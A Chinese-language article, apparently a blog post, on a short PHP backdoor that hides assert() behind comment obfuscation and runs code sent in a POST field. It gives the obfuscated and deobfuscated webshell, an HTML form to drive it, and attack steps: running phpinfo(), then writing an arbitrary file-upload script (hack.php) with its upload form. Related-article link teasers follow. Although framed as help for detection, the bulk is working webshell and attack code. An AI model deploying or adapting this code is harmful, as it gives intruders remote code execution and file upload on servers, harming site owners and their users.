代码简短且隐蔽的后门木马
本文将介绍一个代码很简短,而且很隐蔽的后门木马,以便让大家在检测程序时可以避免被挂木马。
文件内容如下:
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
代码中插入了很多注释符,服务器的检测程序如果不严谨很难检测到。
把注释符删除后,代码如下:
<?php
@$_="s"."s"."e"."r";
@$_="a".$_."t";
@$_(${"_P"."OS"."T"}
[0-2-5]);
?>
最后实际执行的代码内容为:
<?php
assert(${"_POST"}[-7]);
?>
原来这个后门是利用了php assert方法来执行程序。
bool assert ( mixed $assertion [, string $description ] )
assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。
如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。
如果$assertion的内容为phpinfo(); 则会把服务器的信息返回,使攻击者能获取到服务器信息对此攻击。
上传了这个后门程序后,攻击者只需要创建一个简单的html就可以在服务器中执行php语句。
假设后门文件是backdoor.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title> back door </title></head><body><form name="form1" method="post" action="http://www.example.com/backdoor.php"><p><textarea name="-7" style="width:500px; height:300px"></textarea></p><p><input type="submit" value="submit"></p></form></body>
</html>
攻击方式:
1.获取服务器信息可输入
phpinfo();
2.创建一个可随便上传文件的php可输入
file_put_contents('hack.php', '<?php move_uploaded_file($_FILES[\'name\'][\'tmp_name\'], dirname(__FILE__).\'/dest.php\');?>' ,true);
然后创建一个上传文件的html调用hack.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title> upload </title></head><body><form name="form1" method="post" action="http://www.example.com/hack.php" enctype="multipart/form-data"><p><input type="file" name="name"></p><p><input type="submit" value="submit"></p></form></body>
</html>
之后便可随意上传php文件执行了。
代码简短且隐蔽的后门木马相关推荐
- 寻找绝对隐蔽的后门的办法 分享
nginx前几天nginx和IIS7都爆解析漏洞,搞了几个shell都 丢了,于是想寻找一个超级隐蔽的后门方法.无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索includ ...
- php 木马 加密,PHP后门木马详解
说起php后门木马我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木马这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木马做法大家可参考. php后门木马对大家来说一点都不陌生 ...
- mysql定时木马_Mysql的语句生成后门木马的方法
咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...
- php后门木马常用命令
2019独角兽企业重金招聘Python工程师标准>>> php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢? php后门木马常用的函数大致上可分为四种类型: 1. 执行 ...
- 【网络蠕虫】恶意代码之计算机病毒、网络蠕虫、木马
[网络蠕虫]恶意代码之计算机病毒.网络蠕虫.木马 下表内容还未完善 计算机病毒 网络蠕虫 木马 定义 是一段程序 是一段程序 特点(差异) 传播必须要人为参与 寄生于另一段程序或文件 自我复制并大规模 ...
- php命令执行后门,php后门木马常用命令
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢? php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, e ...
- mysql 木马_用Mysql语句来生成后门木马方案
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案. ...
- 网站后门木马怎么清理
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现 ...
- .net 本地文件管理 代码_如何在百万行代码中发现隐藏的后门
试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的. 即使是一款拥有99.9%的Webs ...
最新文章
- 【Python】快速认识Pandas的10大索引
- 共创Linux防火墙,Linux防火墙iptables简明教程
- 通俗易懂的SpringBoot教程---day1---Springboot入门教程介绍
- ethers.js-5-Utilities
- 给英文文章加音标,建生词表
- ccsk matlab,一种CCSK解调预处理方法与流程
- API调用,API传参,面向对接开发,你真的会写接口文档吗?
- 怎么给计算机上锁键盘,想把笔记本电脑的键盘锁住,用外置键盘怎样做?
- 红帽 Linux Redhat6.4安装MySQL 5.1
- 这是一个刚入行程序员的成长
- 数据获取以及处理Beta版本展示
- 线性代数中的线性方程组
- 面试腾讯Java后台岗,处女面秒挂,17天后竟然拿下字节跳动offer
- MFC——CWnd类
- 如何ping网站的IP地址
- 过滤器(Filter)的实现方式
- mybatis-plus insertStrategy、updateStrategy、whereStrategy属性
- QT5.14.2 官方例子 - Qt Widgets 7: Group Box(组合框)
- 分析Crash report
- SKLEARN-3-随机森林